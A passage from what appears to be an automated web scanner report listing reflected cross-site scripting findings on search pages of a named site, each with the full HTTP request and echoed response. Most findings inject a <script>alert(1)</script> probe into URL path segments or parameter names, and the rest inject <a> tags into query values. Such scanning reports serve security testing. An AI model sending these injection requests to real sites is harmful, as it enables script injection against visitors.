<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review2b8ed<script>alert(1)</script>09bc5b8e85/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3899. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 910db<script>alert(1)</script>ea1ae135363 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/review/search.php910db<script>alert(1)</script>ea1ae135363?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review/search.php910db<script>alert(1)</script>ea1ae135363?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3900. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9a76f<a>6676715056c was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search9a76f<a>6676715056c&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search9a76f<a>6676715056c&opt=2 was not found on this server.</p>
...[SNIP]...

2.3901. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2aa35<a>b8a693fbccf was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...2aa35<a>b8a693fbccf&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...2aa35<a>b8a693fbccf&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3902. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e4978<script>alert(1)</script>a3789f51a42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&e4978<script>alert(1)</script>a3789f51a42=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&e4978<script>alert(1)</script>a3789f51a42=1 was not found on this server.</p>
...[SNIP]...

2.3903. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 94321<a>98745856907 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=294321<a>98745856907 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=294321<a>98745856907 was not found on this server.</p>
...[SNIP]...

2.3904. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload abb16<script>alert(1)</script>44759d18353 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesaleabb16<script>alert(1)</script>44759d18353/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesaleabb16<script>alert(1)</script>44759d18353/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3905. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 196e9<script>alert(1)</script>ae18959584a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes196e9<script>alert(1)</script>ae18959584a/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes196e9<script>alert(1)</script>ae18959584a/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3906. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f7089<script>alert(1)</script>0e140ced661 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmosf7089<script>alert(1)</script>0e140ced661/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmosf7089<script>alert(1)</script>0e140ced661/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3907. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ccdcb<script>alert(1)</script>1250fe83ae8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/imagesccdcb<script>alert(1)</script>1250fe83ae8/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/imagesccdcb<script>alert(1)</script>1250fe83ae8/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3908. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f6d89<script>alert(1)</script>6b32918761c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/search.phpf6d89<script>alert(1)</script>6b32918761c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/search.phpf6d89<script>alert(1)</script>6b32918761c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3909. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload faab4<a>c23364a6c46 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchfaab4<a>c23364a6c46&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchfaab4<a>c23364a6c46&opt=2 was not found on this server.</p>
...[SNIP]...

2.3910. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 13dfe<a>2d7dde4f7af was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/search.php?keyword=search...13dfe<a>2d7dde4f7af&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/search.php?keyword=search...13dfe<a>2d7dde4f7af&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3911. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 99788<script>alert(1)</script>acc4b3c90bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&99788<script>alert(1)</script>acc4b3c90bd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&99788<script>alert(1)</script>acc4b3c90bd=1 was not found on this server.</p>
...[SNIP]...

2.3912. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload a81cf<a>ee559f87ea6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2a81cf<a>ee559f87ea6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2a81cf<a>ee559f87ea6 was not found on this server.</p>
...[SNIP]...

2.3913. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 35391<script>alert(1)</script>3ba8e557978 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale35391<script>alert(1)</script>3ba8e557978/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale35391<script>alert(1)</script>3ba8e557978/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3914. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35b04<script>alert(1)</script>2021629dc01 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes35b04<script>alert(1)</script>2021629dc01/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes35b04<script>alert(1)</script>2021629dc01/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3915. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a570<script>alert(1)</script>35c16b05afe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos1a570<script>alert(1)</script>35c16b05afe/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos1a570<script>alert(1)</script>35c16b05afe/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3916. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
